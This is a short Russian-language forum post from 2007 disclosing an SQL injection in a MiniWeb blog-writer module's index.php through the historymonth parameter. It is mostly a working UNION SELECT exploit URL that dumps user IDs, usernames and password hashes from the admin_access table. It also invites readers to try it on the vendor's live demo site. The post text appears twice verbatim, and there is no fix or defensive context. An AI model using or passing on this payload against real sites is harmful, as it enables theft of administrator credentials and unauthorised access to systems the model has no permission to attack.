Constantine
08.12.2007, 03:59
Сайт производителя : http://www.miniweb2.com/15modules/blog-writer.htm
Уязвимость: не фильтруется переменная в параметре historymonth, скрипта index.php
Сплойт:
http://localhost/index.php?historyyear=2007&historymonth=-12+union+select+1,2,concat(user_id,0x3a,username,0 x3a,password),0,5,6,7,8,9,0+from+admin_access/*
Потестить можно на демоверсии на сайте производителя.
з\ы алгоритм шифрования пароля для меня остался загадкой
Уязвимость: не фильтруется переменная в параметре historymonth, скрипта index.php
Сплойт:
http://localhost/index.php?historyyear=2007&historymonth=-12+union+select+1,2,concat(user_id,0x3a,username,0 x3a,password),0,5,6,7,8,9,0+from+admin_access/*
Потестить можно на демоверсии на сайте производителя.
з\ы алгоритм шифрования пароля для меня остался загадкой